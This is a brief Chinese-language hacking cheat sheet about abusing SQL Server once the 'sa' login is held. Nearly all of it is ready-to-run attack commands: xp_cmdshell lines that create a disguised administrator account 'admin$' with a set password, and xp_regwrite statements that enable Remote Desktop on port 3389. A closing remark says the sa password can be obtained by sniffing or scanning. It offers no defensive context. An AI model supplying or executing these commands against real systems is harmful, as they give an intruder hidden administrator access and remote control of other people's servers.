WIN2000直接建立用户:

exec xp_cmdshell ‘net user admin$ 199181 /add’
exec xp_cmdshell ‘net localGroup Administrators admin$ /add’
SQL语句开启3389:
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;
SQL语句关闭3389:
exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;
基本就这些  别的没了

sa密码可以通过嗅探  扫描获得